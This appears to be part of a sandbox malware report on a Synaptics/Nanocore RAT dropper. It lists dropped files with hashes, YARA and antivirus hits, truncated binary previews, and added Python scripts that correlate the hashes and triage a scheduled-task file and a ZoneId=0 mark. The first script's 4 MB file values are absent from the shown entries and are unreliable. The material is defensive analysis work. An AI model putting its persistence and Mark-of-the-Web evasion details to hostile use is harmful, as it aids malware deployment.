                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:modified
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1305
                                                  Entropy (8bit):5.1279304049103
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0zxtn:cbk4oL600QydbQxIYODOLedq3aj
                                                  MD5:CE1E105B814F21C2A8D8AE70C583BC43
                                                  SHA1:DE60AC2CE59CDA55AC1BE7CA321512A0354BB91F
                                                  SHA-256:07E5E7E6FEC07D784FF48078F45906F0DE3998015F884A6339ECD90F6C75A39C
                                                  SHA-512:9A92FFDB658D3FBB65DD4976A00FC84848602E6724D7631F4F2AE37EF1810E86724B9803B009187D720D14359023AFCFE62484659E5D050A2A101C07AC13657F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1310
                                                  Entropy (8bit):5.109425792877704
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                  MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                  SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                  SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                  SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):141
                                                  Entropy (8bit):4.773748828136505
                                                  Encrypted:false
                                                  SSDEEP:3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT
                                                  MD5:B6CD7E93BC7A96C2DC33F819AA3AC651
                                                  SHA1:F313CB2F546A9380FD28A362A221ED711BAAD419
                                                  SHA-256:3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98
                                                  SHA-512:F3CBE5F292A0880F5F205CAD3D9F79E8E5CDFA73D1FA280522B64A5C340AFBD11AB44DA4F8DA50FE695B046CBFFFF9BF083D252D97D9D606A49AAE59588B67FB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<HTML>.<HEAD>.<TITLE>Not Found</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Not Found</H1>.<H2>Error 404</H2>.</BODY>.</HTML>.
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2083328
                                                  Entropy (8bit):7.943244956522882
                                                  Encrypted:false
                                                  SSDEEP:49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ
                                                  MD5:BFF363A92AC43FF249652A83DADC02AB
                                                  SHA1:3C7B47A3F4DC3C8555B656505244886CB3A172F5
                                                  SHA-256:D054E33DE2D63966C68B44DD1D1DE8A9B7ABB76781100FE82423C80E112D4580
                                                  SHA-512:8CEEF643926251A6D6B5FFEE6E662B68580992117D98DBD24CCFDE5CDAD429CE4719A92C63F470C2857272330C9F3A4A2D7F175A6300D6B1833A387F4B841D29
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 49%
                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................B......N.... ........@.. ....................... ...........@.....................................K........?.................... ...................................................... ............... ..H............text...T.... ...................... ..`.rsrc....?.......@..................@..@.reloc........ .....................@..B................0.......H.......H...............X"...t..........................................Z(.....(....s....(....*..(....*6.(.....(....*....0.......... .a..(....(....r...p(....(....o......r...po......(.....~....-6 ....r3..p......(...............(......(....(.........~....{....~.....o....*...........0.............. ...%.....(.....s ....s!..... ....o".... ....o#...($...r;..po%........ ....s&.........o'....[o(...o).......o*....[o(...o+.....o,.....o-....s............io/.....o0.......,...o1.....o2..
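The three .NET PEs that Synaptics.exe drops (4167168, 4171264 and 2083328 bytes) share most of their ssdeep signature, and twice 2083328 falls only 512 and 4608 bytes short of the two larger sizes. The script below is an added example, not part of the Joe Sandbox report: it copies those values from the entries above and checks the relationship by hand, aligning the ssdeep chunk hashes at a common block size and measuring their longest common run (ssdeep itself only scores a pair that shares at least 7 consecutive characters), and it counts how often one SHA-256 recurs in the list, which surfaces the 141-byte 404 page dropped eight times. The labels are ours, and the reading that each 4 MB file carries two copies of the 2 MB binary is an inference from these numbers, not something the report states.

```python
"""Correlate the dropped-file hashes listed in this report section.
Added example; the numbers are copied from the report entries, the
comparison logic is ours, and no ssdeep library is required."""
from collections import Counter

# Values copied from the report entries above.  The labels are ours.
SMALL = {"label": "2 MB .NET PE", "size": 2083328,
         "sha256": "D054E33DE2D63966C68B44DD1D1DE8A9B7ABB76781100FE82423C80E112D4580",
         "ssdeep": "49152:NnA21ODDkXkNpkDWti0EcFKPxqq1VVmkvavPvYMo:NAdDDetDKXiJb1VVmkM3YJ"}
BIG_1 = {"label": "4 MB .NET PE (a)", "size": 4167168,
         "sha256": "8E37D5419EF05382F863549AB137FED6077D554A208B2B8D7EE7C886A8BE9BC5",
         "ssdeep": "98304:hAdDDetDKXiJb1VVmkMqYJlAdDDetDKXiJb1VVmkM3YJ:hAdmZHJxVVm/q6AdmZHJxVVm/3"}
BIG_2 = {"label": "4 MB .NET PE (b)", "size": 4171264,
         "sha256": "7704A9C5892432FB9FC7598D2AA2043DDFE66774516E22081B5588B649942875",
         "ssdeep": "98304:dAdDDetDKXiJb1VVmkM2YJlAdDDetDKXiJb1VVmkM3YJ:dAdmZHJxVVm/26AdmZHJxVVm/3"}
HTML_404 = {"label": "141-byte 404 page", "size": 141,
            "sha256": "3A987926CE1B782E9C95771444A98336801741C07FF44BF75BFC8A38FCCBDF98",
            "ssdeep": "3:INhtq4brKFjKe03i7GeYHoIp//oKF2e0rYd2XbNh8tvl:otqWrKFjKeki7Geql7F2e+YQLNqT"}
# The report section lists the same 404 page eight times.
ENTRIES = [SMALL, BIG_1, BIG_2] + [HTML_404] * 8

ROLLING_WINDOW = 7  # ssdeep scores two signatures only if they share >= 7 consecutive chars


def parse_ssdeep(sig):
    """'blocksize:hash_at_bs:hash_at_2bs' -> (int, str, str)."""
    bs, h1, h2 = sig.split(":", 2)
    return int(bs), h1, h2


def aligned_hashes(a, b):
    """Return the two chunk hashes computed at the same block size, or None
    when the block sizes differ by more than a factor of two."""
    bs_a, a1, a2 = a
    bs_b, b1, b2 = b
    if bs_a == bs_b:
        return a1, b1
    if bs_a * 2 == bs_b:
        return a2, b1  # a's double-block hash lines up with b's base hash
    if bs_b * 2 == bs_a:
        return a1, b2
    return None


def longest_common_substring(x, y):
    """Length of the longest run of characters present in both strings."""
    best = 0
    prev = [0] * (len(y) + 1)
    for i in range(1, len(x) + 1):
        cur = [0] * (len(y) + 1)
        for j in range(1, len(y) + 1):
            if x[i - 1] == y[j - 1]:
                cur[j] = prev[j - 1] + 1
                best = max(best, cur[j])
        prev = cur
    return best


def ssdeep_overlap(sig_a, sig_b):
    """Longest identical run between two ssdeep signatures at a shared block
    size; 0 when the block sizes cannot be aligned at all."""
    pair = aligned_hashes(parse_ssdeep(sig_a), parse_ssdeep(sig_b))
    return longest_common_substring(*pair) if pair else 0


def excess_over_double(size, base):
    """Bytes left after subtracting two copies of `base` from `size`."""
    return size - 2 * base


def sha256_counts(entries):
    """How many times each SHA-256 appears in the dropped-file list."""
    return Counter(e["sha256"] for e in entries)


if __name__ == "__main__":
    for big in (BIG_1, BIG_2):
        run = ssdeep_overlap(SMALL["ssdeep"], big["ssdeep"])
        print(f"{big['label']}: {run}-char run shared with {SMALL['label']} "
              f"(threshold {ROLLING_WINDOW}); size - 2 x {SMALL['size']} = "
              f"{excess_over_double(big['size'], SMALL['size'])} bytes")
    print("4 MB PEs against each other:", ssdeep_overlap(BIG_1["ssdeep"], BIG_2["ssdeep"]))
    for digest, n in sha256_counts(ENTRIES).items():
        if n > 1:
            print(f"SHA-256 {digest[:16]}... listed {n} times")
```

Running it prints a 21-character shared run between each 4 MB file and the 2 MB file's 98304-block hash, and a 24-character run between the two 4 MB files, both well past ssdeep's 7-character threshold; the 2 MB file's double-block hash appears twice inside each larger file's base hash, once verbatim and once with a single character changed.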
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:[ZoneTransfer]....ZoneId=0
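Two of the small dropped files above are worth more than a glance: the Task Scheduler XML written by ._cache_WINDOWS.EXE (no triggers, RunLevel HighestAvailable, declared as UTF-16 although the file is plain ASCII) and the 26-byte Zone.Identifier stream written by Synaptics.exe, which sets ZoneId=0 so the file looks like it originated on the local machine. The script below is an added example, not code from the report or the malware: it parses constructed copies of both artefacts. The task XML reproduces the visible fields, but the report's preview is cut off inside Settings, so the Actions element and its command path are assumptions added to make the document complete; the Zone.Identifier content is reconstructed to the 26-byte length the report gives.

```python
"""Triage a dropped Task Scheduler XML and a Zone.Identifier stream.
Added example; the sample artefacts are constructed to mirror the
report's previews, not copied from the analysed machine."""
import re
import xml.etree.ElementTree as ET

TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Constructed task XML.  Fields through <Settings> follow the report's
# preview; <Actions> and the command path are assumptions (hypothetical).
SAMPLE_TASK = b"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <Hidden>false</Hidden>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Local\\Temp\\example.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# Constructed Zone.Identifier content; 26 bytes, matching the report's size.
SAMPLE_ZONE = b"[ZoneTransfer]\r\n\r\nZoneId=0"

ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}


def load_task_xml(raw: bytes) -> ET.Element:
    """Parse task XML by inspecting the bytes, not the declared encoding.
    The report lists this file as ASCII although its declaration says
    UTF-16; feeding the raw bytes to a parser that trusts the declaration
    would fail, so decode first and strip the declaration."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    elif b"\x00" in raw[:64]:
        text = raw.decode("utf-16-le")
    else:
        text = raw.decode("ascii", errors="replace")
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)
    return ET.fromstring(text)


def task_findings(raw: bytes) -> list:
    """Return the persistence-relevant observations about a task definition."""
    root = load_task_xml(raw)
    ns = {"t": TASK_NS}
    out = []
    triggers = root.find("t:Triggers", ns)
    if triggers is None or len(triggers) == 0:
        out.append("no triggers: task is meant to be started on demand by the dropper")
    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=ns)
    if run_level == "HighestAvailable":
        out.append("RunLevel=HighestAvailable: runs with the user's full (elevated) token")
    for cmd in root.iterfind("t:Actions/t:Exec/t:Command", ns):
        path = (cmd.text or "").lower()
        if "\\appdata\\local\\temp\\" in path or "\\users\\" in path:
            out.append("action runs from a user-writable path: " + (cmd.text or ""))
    return out


def zone_finding(raw: bytes) -> str:
    """Interpret a Zone.Identifier stream.  ZoneId 3 is what a browser writes
    for an Internet download; 0-2 suppress SmartScreen and Protected View."""
    zone = None
    for line in raw.decode("ascii", errors="replace").splitlines():
        key, _, value = line.partition("=")
        if key.strip().lower() == "zoneid" and value.strip().isdigit():
            zone = int(value.strip())
    if zone is None:
        return "no ZoneId: stream is not a Mark-of-the-Web"
    label = ZONE_NAMES.get(zone, "unknown")
    if zone < 3:
        return f"ZoneId={zone} ({label}): file will not get SmartScreen / Protected View treatment"
    return f"ZoneId={zone} ({label})"


if __name__ == "__main__":
    for finding in task_findings(SAMPLE_TASK):
        print("task:", finding)
    print("zone:", zone_finding(SAMPLE_ZONE))
```

The decoding step matters when you lift such a file from a host: a parser that honours the UTF-16 declaration will reject the ASCII bytes, and a parser fed the declaration-free text will not.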
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 32 colors
                                                  Category:dropped
                                                  Size (bytes):4286
                                                  Entropy (8bit):5.941666555948419
                                                  Encrypted:false
                                                  SSDEEP:96:R4bEyJMGzuFNM+N1Bs5V2UFDzykPeFvSY+R1FLXjv9IEvB:ryJMG4K+N1U2KD+HShVr9BZ
                                                  MD5:4AD275D256A4E39FF58EC97B2B800D0D
                                                  SHA1:2FB93750EF528AF84F2801B2AD7D5E5358DEB5F3
                                                  SHA-256:E3F22985C4EEDA15A09D46FF127C3160E8A32F76064FB5B1DC765757CA2C47D8
                                                  SHA-512:B2747BD1019F12C8003F39744AF034FC207CF77B1F1D8EFC19B623AF8A40C4310BE91038EFDF6B233765D9FB40A6AE1E8EAB77B1E0ED1DE1D79F409A58C41CC5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...... .............(... ...@..... ..........................4/.Q3..J*..tL..9&...B<..=:..:3..Rb.eC..gdg.....148.=21.)5G...H..-L..-L..-O.e...p...D=L...'.............z{z.HHI.?A@.dH$.eS$.ZVD.}2,..4..O9..z5....(..6?.e@..q/&..CJ..8J.2. .d_a.........AIY.!-D.. =...9.."@..&B.\~....7.'.#.................IJJ.daa.vD..kW'.}k5.{0*.|0/.SA.../8..7;..26..8:..G ..;F..5>.f2..2...YD..XD..XB..*5I...2...3...7...;.Ii....0...-......... "%.........hkp.]:..RB&.i[9.u.*.{+*...3..00..13..09../8..18..;L..2:..6?..L......!...K1..5@X...*.../...1...5...,...+.. <.......'.*+-.YWY.....TRU.F0..zO..TK4.l,(...+.y-....3.~.0...7...;..0:..17..0:..0:..1=.........8...6@Y...+...(...(.......0...&. .K.413...$.?BG.....~...\Z^.P1&.B:-.i[A.g'&.t/).t-..r,-..*0../1...4../6..08../9...8..*8.........fJ..@Jb...+...#....... ..."....."+@.......%.?CD..........|..B...C>..NB/.g*(.},4.j,,.u),.w+1..0/..-2..-3..+3.{,5..-6...7.........iJ..KVk..."......................-A.....08F.edh.IFI.....uqp.s@..A.'.iP2.a)(.o+2.i)+.r)-.u,0..,...-2.~*/.z-3.z+4.z+
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:ISO-8859 text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):3.0
                                                  Encrypted:false
                                                  SSDEEP:3:dQdF8tn:d48tn
                                                  MD5:08CA11A5C1C0F512CBA782C72146F31F
                                                  SHA1:A9EEE7A59F9F17593659936562486B6CB2F1F7CF
                                                  SHA-256:6F884EF1DF10DA3818A962671AC57758EB7CFBDB3EF19B7F9D74591AD6F40266
                                                  SHA-512:8107AFC5CABE9456E1CCE083D3E004C474D4E74276D5624A975E1E7CFBF6AB2FBA4E23EF3C1F227574C4D8159F5EFB22B5593D6CF0A3EBB268C54A081BD31375
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:)..5...H
                                                  Process:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):42
                                                  Entropy (8bit):4.5468465893424055
                                                  Encrypted:false
                                                  SSDEEP:3:oNWXp5vLtvvGgC:oNWXpFpva
                                                  MD5:8B8734AD46DC590CE9477D244253704A
                                                  SHA1:731628CADE04234B080F6DCAC26DAC312C09686E
                                                  SHA-256:5E1A17A6BB95D373FF27E707E303A0D737A8C82E87B6843A71CA500926192177
                                                  SHA-512:491D11D0BD35C4278429FAEBA578717B4C796C36E1FBB9DE1528D52A7D186AA660490A1DD239B8B01B9A976B1C080190895E974503CC003072B7358AF46D5431
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:C:\Users\user\Desktop\._cache_WINDOWS.EXE
                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1082880
                                                  Entropy (8bit):6.856551135053279
                                                  Encrypted:false
                                                  SSDEEP:24576:jFYnnsJ39LyjbJkQFMhmC+6GD9vApfbZXJf:jFunsHyjtk2MYC5GDtA1
                                                  MD5:3A5072A9A5DC35DFB99A59F67C3DC6C0
                                                  SHA1:335398BB44927DDB18905221C52A89AA101A3C7F
                                                  SHA-256:29BF88F94FFAB5559B5AF5A9DB05CFDBE2BEEB81301F1E64E851CFA925C930AC
                                                  SHA-512:B3B11F8E5B495C873A8AFA58FDC2F2FEF7E7D610A50516FB701DAB1197AC11A63E5F857F9B6ECF1A9B33FDF0D875ECF59695BE83FF35AFCBC23F8293D068E8FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Florian Roth
                                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_Synaptics.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 93%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F..Q............m.>.....m...F...m.........3.........V...m.......m.=.....Rich............................PE..L....0.N.................z..........H2............@.......................................@.....................................<..................................`...............................H...@...............$............................text...Bx.......z.................. ..`.rdata...1.......2...~..............@..@.data...............................@....rsrc..............................@..@.reloc...............r..............@..B................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\WINDOWS.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):208384
                                                  Entropy (8bit):7.451462755520174
                                                  Encrypted:false
                                                  SSDEEP:6144:ULV6Bta6dtJmakIM5n2B/XMekQlD/7W6Qyf0b:ULV6BtpmkbZXxVpQyf0b
                                                  MD5:568E6A074378730CEE0947C4C796372D
                                                  SHA1:7688894728B8207756F52384798E394DE8D54070
                                                  SHA-256:2F990B69464DAB55B2EBC8F6A302FE09E5767844B4AFB71B43A20A6C2EA48D8D
                                                  SHA-512:250A1215FD28E4CD5F6DA3E72B42A88F93664D4A2484D29F6141A81EF4968872B86379FB54AAF2E645D46EF8C881E43D1C32392DC3F7C381A86C252D7BDB2730
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Florian Roth
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, Author: Kevin Breen <kevin@techanarchy.net>
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Metadefender, Detection: 88%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 98%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................d........... ........@.. ......................................................................8...W.... .. `........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc... `... ...b..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
                                                  Process:C:\Users\user\Desktop\y8kdmHi6x3.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1082880
                                                  Entropy (8bit):6.856551135053279
                                                  Encrypted:false
                                                  SSDEEP:24576:jFYnnsJ39LyjbJkQFMhmC+6GD9vApfbZXJf:jFunsHyjtk2MYC5GDtA1
                                                  MD5:3A5072A9A5DC35DFB99A59F67C3DC6C0
                                                  SHA1:335398BB44927DDB18905221C52A89AA101A3C7F
                                                  SHA-256:29BF88F94FFAB5559B5AF5A9DB05CFDBE2BEEB81301F1E64E851CFA925C930AC
